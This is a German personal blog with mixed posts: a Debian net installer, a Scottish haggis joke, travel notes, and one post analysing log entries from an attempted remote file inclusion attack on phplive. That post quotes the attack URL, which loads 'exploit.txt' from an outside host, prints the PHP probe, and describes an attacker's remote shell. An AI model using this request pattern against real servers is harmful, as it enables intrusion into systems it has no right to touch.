Auf der debian-boot- Mailinglist wurde angekündigt, dass es ein Programm geben wird, das man unter Windows XP starten kann, und das automatisch den Installer bootet – ganz ohne CD. Alle benötigten Daten werden übers Internet heruntergeladen.

Mehr dazu gibt es auf der Seite http://goodbye-microsoft.com/

… manifestiert sich oft in Kleinigkeiten. Sie: “Elefantenfußförming”, Er: “Zylinderförmig. Oder ist das nur der Unterschied zwischen Nicht-Naturwissenschaftlern (bzw. Ingenieuren) und Physikern?

In Schottland kann man ab und zu “Haggis” essen, als Mahlzeit oder Zwischenmahlzeit. Außerhalb Schottland ist der “Great Chieftain o’ the Puddin-race”, wie Robert Burns das Gericht lobt, weitgehend unbekannt.

Dass Haggis tierischen Ursprungs ist, lässt sich unschwer erraten, aber woraus wird es gemacht?

Die Antwort ist einfach: Haggis ist nicht nur ein Gericht, sondern auch das Tier, aus dem man Haggis macht, heißt genauso. Das Haggis sieht man selten, und es wird nur an einem Tag des Jahres gejagt, im Januar vor dem traditionellen Burns-Supper.

Das Haggis lebt an den Hügelhängen, und wird hat deshalb auf einer Seite längere Beine als auf der anderen. In guten Schottischen Küchen gibt es deshalb getrenntes Links- und Rechtsläufiges Haggis.

Gejagt wird Haggis in Schottland noch ganz traditionell: mit lauten Rufen und Backpipe-Musik wird das Haggis ins Tal getrieben, wo es wegen seiner unterschiedlich langen Beine recht ungeschickt ist und leicht erlegt werden kann.

Das ist zumindest die Version, die Ausländern gerne in Schottland erzählt wird, in hundert verschiedenen Variationen. Wer wissen will, was Haggis wirklich ist, sollte sich den entsprechenden Wiki-Artikel durchlesen.

Update: Foto hinzugefügt

[tags]Schottland, Haggis, Humor, Essen, Tradition[/tags]

Seit gestern habe ich ab und zu in den Logfiles meines Webservers 404-Fehler, die folgendes Schema haben:

http://meine-domain.org/phplive/help.php?css_path=http://211.176.andere.zahlen:8000/exploit.txt?

Von Neugierde getrieben habe ich mir die Datei exploit.txt mal heruntergeladen. Und das steht drinnen:

< ?
echo 'berceamondialu';
?>

Also PHP. Anscheinend gibt es eine Lücke in phplive, die es Angreifern erlaubt, beliebige externe Dateien als “CSS” zu laden, das dann auch als php interpretiert wird. Toll, nicht?

Wenn der Webserver jetzt das komische Wort in den einfachen Anführungszeichen (’berceamondialu’) ohne das echo davor ausspuckt, weiß der Angreifer, dass der Server verwundbar ist, schön automatisierbar.

Auf dem Server, auf dem die exploits.txt liegt, gibt es noch ein paar andere Dateien (freundlicherweise wird einem ein directory index angezeigt ;). Unter anderem eine php-remoteshell, die passwortgeschützt ist (Benutzername und Passwort beides md5-gehashed und identisch, der hash ist ec371748dc2da624b35a4f8f685dd122, wobei per default die Authentifizierung ausgeschaltet ist. Benutzerführung ist zweisprachig englisch und russisch, ebenso die Kommentare in der Datei (wobei die russischen ausführlicher sind).

Das Ding kann auch auf Datenbanken zugreifen, MSSQL, MySQL, Postgres und Oracle werden wohl unterstützt, und dann gibt es noch ein Spammer-Modul.

Schon interessant, was es da so alles gibt, aber auch abschreckend.
[tags]Sicherheit,phplive,exploit,spammer,spam,webserver,server[/tags]

Timo hat einen guten Bericht über die Arbeitsweise von Online-Redaktionen geschrieben, z.B. wie Spiegel Online arbeitet, und ob sich das von den “klassischen” unterscheidet, sehr lesenswert.

Back to dear ol’ Scotland – nach einer fast einmontagine Weihnachtspause bin ich wieder im Schottischen Exil gelandet, das Herz noch traurig vom Abschied…

Die Reise verlief recht Problem- und Ereignislos, das größte Ärgernis war ein total überheizter Bus von Glasgow nach Edinburgh, in dem es mir selbst nach Ausziehen des Pullovers im T-Shirt noch zu warm war.
[tags]Schottland, Reise, Flug, Bus, Abschied[/tags]